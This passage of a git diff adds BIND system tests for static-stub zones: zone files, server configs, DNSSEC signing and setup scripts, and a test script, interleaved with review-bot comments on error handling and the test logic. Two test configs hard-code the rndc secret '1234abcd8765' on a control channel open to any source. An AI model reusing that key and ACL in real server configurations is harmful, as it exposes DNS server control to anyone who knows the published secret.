@@ -0,0 +1,18 @@ + +; <<>> DiG 8.2 <<>> -p @10.53.0.3 data.child.example txt +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; data.example, type = TXT, class = IN + +;; ANSWER SECTION: +data.example. 5M IN TXT "some" "test" "data" + +;; Total query time: 8 msec +;; FROM: draco to SERVER: 10.53.0.3 +;; WHEN: Wed Jun 21 10:58:54 2000 +;; MSG SIZE sent: 36 rcvd: 97 + diff --git a/bin/tests/system/staticstub/ns1/named.conf.in b/bin/tests/system/staticstub/ns1/named.conf.in new file mode 100644 index 0000000..985b932 --- /dev/null +++ b/bin/tests/system/staticstub/ns1/named.conf.in @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify no; +}; + +zone "." { type primary; file "root.db"; }; diff --git a/bin/tests/system/staticstub/ns1/root.db b/bin/tests/system/staticstub/ns1/root.db new file mode 100644 index 0000000..26bc039 --- /dev/null +++ b/bin/tests/system/staticstub/ns1/root.db 
@@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.isc.org. 1 600 600 1200 600 +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example.com. NS example. + +ns.example.net. A 10.53.0.3 diff --git a/bin/tests/system/staticstub/ns2/named.conf.in b/bin/tests/system/staticstub/ns2/named.conf.in new file mode 100644 index 0000000..0724607 --- /dev/null +++ b/bin/tests/system/staticstub/ns2/named.conf.in 
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "trusted.conf";
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify no;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type static-stub;
+ server-addresses { 10.53.0.3; };
+ allow-query { !10.53.0.7; any; };
+};
+
+zone "example.org" {
+ type static-stub;
+ SERVER_CONFIG_PLACEHOLDER
+};
+
+zone "example.info" {
+ type static-stub;
+ server-addresses { ::1; }; #ns4
+};
+
+zone "undelegated" {
+ type static-stub;
+ server-addresses { 10.53.0.3; };
+};
diff --git a/bin/tests/system/staticstub/ns3/example.db.in b/bin/tests/system/staticstub/ns3/example.db.in
new file mode 100644
index 0000000..c3b7d81
--- /dev/null
+++ b/bin/tests/system/staticstub/ns3/example.db.in
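Review bot: The `controls` block accepts rndc connections from `any` source and authenticates them with the literal secret `1234abcd8765`, which is public once committed; ns3/named.conf.in in this commit carries the same pair. That is tolerable only because the listener is bound to a 10.53.0.x test address, and the file should say so, for example `# test-only rndc key; never reuse outside the system tests` above `key rndc_key`. If the harness only issues rndc from the 10.53.0.x aliases (not visible in this hunk), narrowing the ACL to `allow { 10.53.0.0/24; }` would reduce the exposure without affecting the tests.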
@@ -0,0 +1,32 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA ns3.example. hostmaster.example. ( + 2010080900 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns4.example. ; fake +example. A 10.53.0.4 ; fake +example. AAAA ::1 ; fake + +ns4.example. A 10.53.0.4 +data.example. TXT "some" "test" "data" +data2.example. TXT "2nd test data" +data3.example. TXT "3rd test data" +data4.example. TXT "4th test data" + +sub.example. NS ns.sub.example. +ns.sub.example. A 10.53.0.4 diff --git a/bin/tests/system/staticstub/ns3/example.org.db b/bin/tests/system/staticstub/ns3/example.org.db new file mode 100644 index 0000000..aec2f99 --- /dev/null +++ b/bin/tests/system/staticstub/ns3/example.org.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.org IN SOA ns.example.org. hostmaster.example.org. ( + 2010080906 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.org. NS ns.example.org. +ns.example.org. A 10.53.0.3 + +data.example.org. TXT "example org data" 
diff --git a/bin/tests/system/staticstub/ns3/named.conf.in b/bin/tests/system/staticstub/ns3/named.conf.in
new file mode 100644
index 0000000..cbff743
--- /dev/null
+++ b/bin/tests/system/staticstub/ns3/named.conf.in
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify no;
+};
+
+EXAMPLE_ZONE_PLACEHOLDER
+
+zone "example.org" {
+ type primary;
+ file "example.org.db";
+};
+
+zone "undelegated" {
+ type primary;
+ file "undelegated.db.signed";
+};
diff --git a/bin/tests/system/staticstub/ns3/sign.sh b/bin/tests/system/staticstub/ns3/sign.sh
new file mode 100755
index 0000000..111ffaf
--- /dev/null
+++ b/bin/tests/system/staticstub/ns3/sign.sh
@@ -0,0 +1,44 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=example.
+infile=example.db.in
+zonefile=example.db
+
+(cd ../ns4 && $SHELL -e sign.sh )
+
+cp ../ns4/dsset-sub.example$TP .
+
+keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone)
+cat $infile $keyname1.key $keyname2.key > $zonefile
+
+$SIGNER -g -o $zone $zonefile > /dev/null
+
+# Configure the resolving server with a trusted key.
+keyfile_to_static_ds $keyname2 > trusted.conf
+
+zone=undelegated
+infile=undelegated.db.in
+zonefile=undelegated.db
+keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone)
+cat $infile $keyname1.key $keyname2.key > $zonefile
+
+$SIGNER -g -o $zone $zonefile > /dev/null
+
+keyfile_to_static_ds $keyname2 >> trusted.conf
+cp trusted.conf ../ns2/trusted.conf
diff --git a/bin/tests/system/staticstub/ns3/undelegated.db.in b/bin/tests/system/staticstub/ns3/undelegated.db.in
new file mode 100644
index 0000000..a7010ef
--- /dev/null
+++ b/bin/tests/system/staticstub/ns3/undelegated.db.in
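Review bot: Nothing in this script stops on error: the shebang is plain `#!/bin/sh` while ns4/sign.sh uses `#!/bin/sh -e`, so it only fails fast when launched as `$SHELL -e sign.sh`, the way setup.sh does. Run directly, a failed `$KEYGEN` or `$SIGNER` would still reach `cp trusted.conf ../ns2/trusted.conf` and give the validating resolver an incomplete trust-anchor file, which can make the DNSSEC test results misleading. Adding `set -e` right after the license header makes the behaviour independent of the caller. Quoting the expansions, as in `"$zone"`, `"$zonefile"` and `"$keyname2"`, would be a cheap follow-up.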
@@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +undelegated. IN SOA ns3.undelegated. hostmaster.undelegated. ( + 2010080900 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +undelegated. NS ns3.undelegated. +undelegated. A 10.53.0.4 +undelegated. AAAA ::1 +ns3.undelegated. A 10.53.0.3 diff --git a/bin/tests/system/staticstub/ns4/example.com.db b/bin/tests/system/staticstub/ns4/example.com.db new file mode 100644 index 0000000..3db8fa4 --- /dev/null +++ b/bin/tests/system/staticstub/ns4/example.com.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.com IN SOA example. hostmaster.example. ( + 2010080701 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.com. NS example. + +data.example.com. TXT "example com data" diff --git a/bin/tests/system/staticstub/ns4/example.info.db b/bin/tests/system/staticstub/ns4/example.info.db new file mode 100644 index 0000000..169c70d --- /dev/null +++ b/bin/tests/system/staticstub/ns4/example.info.db 
@@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.info IN SOA ns.example.info. hostmaster.example.info. ( + 2010080902 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.info. NS ns.example.info. +ns.example.info. A 10.53.0.4 + +data.example.info. TXT "example info data" diff --git a/bin/tests/system/staticstub/ns4/example.org.db b/bin/tests/system/staticstub/ns4/example.org.db new file mode 100644 index 0000000..69dc7e3 --- /dev/null +++ b/bin/tests/system/staticstub/ns4/example.org.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.org IN SOA ns.example.org. hostmaster.example.org. ( + 2010080908 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.org. NS ns.example.org. +ns.example.org. A 10.53.0.3 + +data.example.org. TXT "example org data" +data2.example.org. TXT "2nd example org data" diff --git a/bin/tests/system/staticstub/ns4/named.conf.in b/bin/tests/system/staticstub/ns4/named.conf.in new file mode 100644 index 0000000..40c2a17 --- /dev/null 
+++ b/bin/tests/system/staticstub/ns4/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { ::1; }; + recursion no; + dnssec-validation no; + notify no; +}; + +zone "example.com" { + type primary; + file "example.com.db"; +}; + +zone "example.org" { + type primary; + file "example.org.db"; +}; + +zone "sub.example" { + type primary; + file "sub.example.db.signed"; +}; + +zone "example.info" { + type primary; + file "example.info.db"; +}; diff --git a/bin/tests/system/staticstub/ns4/sign.sh b/bin/tests/system/staticstub/ns4/sign.sh new file mode 100755 index 0000000..14c5072 --- /dev/null +++ b/bin/tests/system/staticstub/ns4/sign.sh 
@@ -0,0 +1,26 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=sub.example
+infile=${zone}.db.in
+zonefile=${zone}.db
+
+keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone)
+
+cat $infile $keyname1.key $keyname2.key > $zonefile
+
+$SIGNER -o $zone $zonefile > /dev/null
diff --git a/bin/tests/system/staticstub/ns4/sub.example.db.in b/bin/tests/system/staticstub/ns4/sub.example.db.in
new file mode 100644
index 0000000..255396b
--- /dev/null
+++ b/bin/tests/system/staticstub/ns4/sub.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+sub.example. IN SOA ns.sub.example. hostmaster.example. (
+ 2010080900 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+sub.example. NS ns.sub.example.
+ns.sub.example. A 10.53.0.4
+
+data1.sub.example. TXT "1st sub test data"
+data2.sub.example. TXT "2nd sub test data"
+data3.sub.example. TXT "3rd sub test data"
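Review bot: The error handling in ns4/sign.sh lives only in the `#!/bin/sh -e` shebang, which is ignored whenever the script is started through an interpreter instead of being executed directly; the staticstub setup.sh in this commit starts the ns3 script as `$SHELL -e sign.sh`, so callers evidently have to remember the flag. How this ns4 script is invoked is not visible here. An explicit `set -e` as the first statement of the body makes a failed `$KEYGEN` stop the script however it is launched, instead of continuing with an empty `keyname1`. The expansions in `cat $infile $keyname1.key $keyname2.key > $zonefile` would also be better quoted, `cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile"`.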
diff --git a/bin/tests/system/staticstub/setup.sh b/bin/tests/system/staticstub/setup.sh
new file mode 100755
index 0000000..8d8037d
--- /dev/null
+++ b/bin/tests/system/staticstub/setup.sh
@@ -0,0 +1,26 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in tmp
+sed 's/SERVER_CONFIG_PLACEHOLDER/server-names { "ns.example.net"; };/' tmp > ns2/named.conf
+
+copy_setports ns3/named.conf.in tmp
+sed 's/EXAMPLE_ZONE_PLACEHOLDER/zone "example" { type master; file "example.db.signed"; };/' tmp > ns3/named.conf
+
+copy_setports ns4/named.conf.in ns4/named.conf
+
+cd ns3 && $SHELL -e sign.sh
diff --git a/bin/tests/system/staticstub/tests.sh b/bin/tests/system/staticstub/tests.sh
new file mode 100755
index 0000000..bd4167e
--- /dev/null
+++ b/bin/tests/system/staticstub/tests.sh
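Review bot: Nothing in staticstub/setup.sh stops on a failed step, and both `sed` commands read the same scratch file `tmp`. If `copy_setports ns3/named.conf.in tmp` fails without rewriting the file, the following `sed` could generate ns3/named.conf from the ns2 template still sitting in `tmp`, and the script's exit status comes only from the final `cd ns3 && $SHELL -e sign.sh`. I would add `set -e` after sourcing conf.sh, or append `|| exit 1` to each `copy_setports` and `sed` line, so a broken configuration is reported at setup time and not as an unrelated test failure. Whether `tmp` is removed afterwards is not visible in this hunk.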
@@ -0,0 +1,218 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +for conf in conf/good*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "trying an axfr that should be denied (NOTAUTH) ($n)" +ret=0 +$DIG $DIGOPTS +tcp data.example. @10.53.0.2 axfr > dig.out.ns2.test$n || ret=1 +grep "; Transfer failed." dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "non recursive query for a static-stub zone with server name should be rejected ($n)" +ret=0 + $DIG $DIGOPTS +tcp +norec data.example. @10.53.0.2 txt > dig.out.ns2.test$n \ + || ret=1 +grep "REFUSED" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "non recursive query for a static-stub zone with server name should be rejected ($n)" +ret=0 +$DIG $DIGOPTS +tcp +norec data.example.org. 
@10.53.0.2 txt > dig.out.ns2.test$n \ + || ret=1 +grep "REFUSED" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "allow-query ACL ($n)" +ret=0 +$DIG $DIGOPTS +tcp +norec data.example. @10.53.0.2 txt -b 10.53.0.7 \ + > dig.out.ns2.test$n || ret=1 +grep "REFUSED" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "look for static-stub zone data with recursion (should be found) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noauth data.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +digcomp knowngood.dig.out.rec dig.out.ns2.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking authoritative NS is ignored for delegation ($n)" +ret=0 +# the auth server returns a different (and incorrect) NS for .example. +$DIG $DIGOPTS +tcp example. @10.53.0.2 ns > dig.out.ns2.test1.$n || ret=1 +grep "ns4.example." dig.out.ns2.test1.$n > /dev/null || ret=1 +# but static-stub configuration should still be used +$DIG $DIGOPTS +tcp data2.example. @10.53.0.2 txt > dig.out.ns2.test2.$n || ret=1 +grep "2nd test data" dig.out.ns2.test2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking queries for a child zone of the static-stub zone ($n)" +ret=0 +# prime the delegation to a child zone of the static-stub zone +$DIG $DIGOPTS +tcp data1.sub.example. @10.53.0.2 txt > dig.out.ns2.test1.$n || ret=1 +grep "1st sub test data" dig.out.ns2.test1.$n > /dev/null || ret=1 +# temporarily disable the the parent zone +copy_setports ns3/named.conf.in tmp +sed 's/EXAMPLE_ZONE_PLACEHOLDER//' tmp > ns3/named.conf +rndc_reload ns3 10.53.0.3 +# query the child zone again. this should directly go to the child and +# succeed. 
+for i in 0 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS +tcp data2.sub.example. @10.53.0.2 txt > dig.out.ns2.test2.$n || ret=1 + grep "2nd sub test data" dig.out.ns2.test2.$n > /dev/null && break + sleep 1 +done +grep "2nd sub test data" dig.out.ns2.test2.$n > /dev/null || ret=1 +# re-enable the parent +copy_setports ns3/named.conf.in tmp +sed 's/EXAMPLE_ZONE_PLACEHOLDER/zone "example" { type master; file "example.db.signed"; };/' tmp > ns3/named.conf +rndc_reload ns3 10.53.0.3 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking authoritative NS addresses are ignored for delegation ($n)" +ret=0 +# the auth server returns a different (and incorrect) A/AAA RR for .example. +$DIG $DIGOPTS +tcp example. @10.53.0.2 a > dig.out.ns2.test1.$n || ret=1 +grep "10.53.0.4" dig.out.ns2.test1.$n > /dev/null || ret=1 +$DIG $DIGOPTS +tcp example. @10.53.0.2 aaaa > dig.out.ns2.test2.$n || ret=1 +grep "::1" dig.out.ns2.test2.$n > /dev/null || ret=1 +# reload the server. this will flush the ADB. +rndc_reload ns2 10.53.0.2 +# ask another RR that would require delegation. static-stub configuration +# should still be used instead of the authoritative A/AAAA cached above. +$DIG $DIGOPTS +tcp data3.example. @10.53.0.2 txt > dig.out.ns2.test3.$n || ret=1 +grep "3rd test data" dig.out.ns2.test3.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# the authoritative server of the query domain (example.com) is the apex +# name of the static-stub zone (example). in this case the static-stub +# configuration must be ignored and cached information must be used. +n=`expr $n + 1` +echo_i "checking NS of static-stub is ignored when referenced from other domain ($n)" +ret=0 +$DIG $DIGOPTS +tcp data.example.com. 
@10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "example com data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# check server-names +n=`expr $n + 1` +echo_i "checking static-stub with a server-name ($n)" +ret=0 +$DIG $DIGOPTS +tcp data.example.org. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "example org data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +# Note: for a short term workaround we use ::1, assuming it's configured and +# usable for our tests. We should eventually use the test ULA and available +# checks introduced in change 2916. +if testsock6 ::1 +then + echo_i "checking IPv6 static-stub address ($n)" + ret=0 + $DIG $DIGOPTS +tcp data.example.info. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 + grep "example info data" dig.out.ns2.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +else + echo_i "SKIPPED: checking IPv6 static-stub address ($n)" +fi + +n=`expr $n + 1` +echo_i "look for static-stub zone data with DNSSEC validation ($n)" +ret=0 +$DIG $DIGOPTS +tcp +dnssec data4.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "ad; QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "4th test data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "look for a child of static-stub zone data with DNSSEC validation ($n)" +ret=0 +$DIG $DIGOPTS +tcp +dnssec data3.sub.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "ad; QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "3rd sub test data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# reload with a different name server: existing zone shouldn't be reused. 
+n=`expr $n + 1` +echo_i "checking server reload with a different static-stub config ($n)" +ret=0 +copy_setports ns2/named.conf.in tmp +sed 's/SERVER_CONFIG_PLACEHOLDER/server-addresses { 10.53.0.4; };/' tmp > ns2/named.conf +rndc_reload ns2 10.53.0.2 +$DIG $DIGOPTS +tcp data2.example.org. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "2nd example org data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking static-stub of a undelegated tld resolves after DS query ($n)" +ret=0 +$DIG $DIGOPTS undelegated. @10.53.0.2 ds > dig.out.ns2.ds.test$n +$DIG $DIGOPTS undelegated. @10.53.0.2 soa > dig.out.ns2.soa.test$n +grep "status: NXDOMAIN" dig.out.ns2.ds.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns2.soa.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/statistics/ans4/ans.pl b/bin/tests/system/statistics/ans4/ans.pl new file mode 100644 index 0000000..3a37a82 --- /dev/null +++ b/bin/tests/system/statistics/ans4/ans.pl 
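Review bot: The "allow-query ACL" check in staticstub/tests.sh cannot fail for the reason it is named after. It sends the same `+norec` query for `data.example.` that the earlier test already expects to be `REFUSED` from the default source address, so `grep "REFUSED"` passes whether or not the ACL rejects 10.53.0.7. To exercise the access control, the query from `-b 10.53.0.7` should be one that an allowed client gets answered, for example the recursive form from the "with recursion (should be found)" test, `$DIG $DIGOPTS +tcp data.example. @10.53.0.2 txt -b 10.53.0.7`; the ns2 ACL is not in this hunk, so confirm which sources it denies. Separately, `RNDCCMD` is assigned but never used in this file, and the two `undelegated.` queries in the last test lack the `|| ret=1` that every other `$DIG` call carries.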
